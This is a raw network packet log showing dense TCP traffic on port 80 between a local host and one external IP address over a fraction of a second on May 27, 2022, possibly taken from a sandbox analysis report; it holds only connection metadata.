May 27, 2022 12:02:27.372117043 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372128963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372143030 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372143984 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372167110 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372173071 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372193098 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372196913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372217894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372222900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372241020 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372247934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372266054 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372272968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372291088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372298002 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372318029 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372325897 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372343063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372351885 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372365952 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372375011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372390985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372399092 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372416019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372421026 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372440100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372452021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372463942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372467995 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372498989 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372500896 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372525930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372530937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372549057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372555971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372574091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372581005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372598886 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372612000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372622967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372628927 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372649908 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372654915 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372673988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372680902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372699976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372705936 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372725964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372750998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372770071 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372773886 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372775078 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372785091 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372798920 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372807980 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372823000 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372829914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372848988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372855902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372873068 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372879982 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372896910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372904062 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372921944 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372929096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372946978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372952938 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372971058 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.372976065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.372996092 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373002052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373023033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373027086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373048067 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373054981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373071909 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373079062 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373096943 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373101950 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373121977 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373126984 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373147964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373153925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373172998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373181105 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373203039 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373209953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373226881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373234034 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373250961 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373260021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373274088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373282909 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373297930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373306990 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373323917 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373328924 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373347044 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373356104 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373372078 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373380899 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373397112 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373404026 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373420954 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373429060 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373445988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373452902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373471022 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373476028 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373496056 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373502016 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373521090 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373527050 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373544931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373553038 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373569965 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373575926 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373595953 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373601913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373620033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373639107 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373646975 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373667002 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373672009 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373682022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373696089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373697996 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373720884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373728037 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373745918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373752117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373770952 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373779058 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373796940 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373802900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373821974 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373830080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373847008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373852968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373871088 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373878956 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373895884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373903036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373922110 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373929977 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373946905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373955011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373970985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.373981953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.373996019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374006033 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374020100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374022007 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374046087 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374052048 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374069929 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374078989 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374094963 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374097109 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374121904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374128103 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374145985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374156952 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374171019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374176025 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374196053 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.374202967 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.374229908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.378081083 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395792007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395823002 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395845890 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395869970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395893097 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395915031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395927906 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395936966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395944118 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395956039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395960093 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395962000 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395967960 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395976067 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395982981 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.395993948 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.395999908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396007061 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396018028 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396029949 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396037102 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396054983 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396055937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396079063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396086931 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396101952 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396105051 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396125078 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396133900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396147966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396150112 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396171093 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396178961 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396194935 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396207094 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396218061 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396224022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396241903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396249056 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396265984 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396272898 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396289110 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396313906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396336079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396358967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396380901 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396403074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396423101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396426916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.396429062 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396435976 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396445036 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396456957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396461010 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.396487951 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.399650097 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401057959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401083946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401108027 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401132107 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401145935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401154041 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401154995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401174068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401177883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401197910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401201963 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401202917 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401213884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401225090 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401232004 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401247978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401257992 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401271105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401274920 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401293993 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401302099 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401318073 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401329041 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401340961 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401345968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401365042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401372910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401386976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401388884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401411057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401417971 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401434898 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401443958 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401458025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401459932 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401482105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401489973 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401505947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401516914 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401529074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401534081 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401552916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401561022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401576996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401586056 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401601076 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401606083 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401623964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401631117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401648998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401673079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401684999 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401690006 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401696920 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401710987 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401720047 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401727915 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401742935 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401746035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401767015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401773930 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401792049 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401798964 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401815891 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401834965 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401839018 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401848078 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401861906 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401866913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401886940 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401896954 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401911974 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401912928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401935101 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401954889 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401958942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401976109 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.401981115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.401998997 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402004004 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402018070 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402026892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402040005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402050018 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402055979 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402074099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402081966 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402097940 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402107954 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402120113 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402123928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402146101 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402153015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402168989 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402179956 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402192116 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402195930 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402215958 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402226925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402239084 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402251005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402261019 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402265072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402285099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402292967 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402311087 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402321100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402334929 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402347088 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402358055 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402365923 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402380943 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402390957 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402405977 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402415037 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402430058 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402431965 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402452946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402462006 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402476072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.402487993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.402498007 CEST	80	49171	2.56.57.22	192.168.2.22
